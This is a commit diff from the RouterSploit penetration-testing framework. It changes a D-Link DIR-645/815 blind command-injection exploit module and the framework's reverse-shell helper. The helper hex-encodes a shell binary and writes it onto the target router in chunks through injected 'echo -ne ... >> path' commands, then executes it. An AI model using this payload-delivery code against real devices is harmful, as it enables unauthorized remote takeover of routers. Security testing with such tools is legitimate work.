D-Link Dir-645 & Dir-815 RCE echo reverse shell (#213)

d38fa116 · Marcin Bury · Mariusz Kupidura · 479e110c · d38fa116 · d38fa116
Commit d38fa116 authored Mar 19, 2017 by Marcin Bury Committed by Mariusz Kupidura Mar 19, 2017
Hide whitespace changes
Inline Side-by-side

Showing with 3 additions and 3 deletions

dir_645_815_rce.py routersploit/modules/exploits/dlink/dir_645_815_rce.py +1 -1

shell.py routersploit/shell.py +2 -2

No files found.
--- a/routersploit/modules/exploits/dlink/dir_645_815_rce.py
+++ b/routersploit/modules/exploits/dlink/dir_645_815_rce.py
@@ -46,7 +46,7 @@ class Exploit(exploits.Exploit):
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
-            shell(self, architecture="mipsel")
+            shell(self, architecture="mipsel", method="echo", binary="echo", location="/var/tmp/")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")


--- a/routersploit/shell.py
+++ b/routersploit/shell.py
@@ -427,8 +427,8 @@ class reverse_shell(object):
            print_status("Transferring {}/{} bytes".format(current, len(self.revshell)))

            block = self.revshell[current:current + 30].encode('hex')
-            block = "\\x" + "\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
-            cmd = '$(echo -n -e "{}" >> {})'.format(block, path)
+            block = "\\\\x" + "\\\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
+            cmd = 'echo -ne "{}" >> {}'.format(block, path)
            self.exploit.execute(cmd)

        # execute binary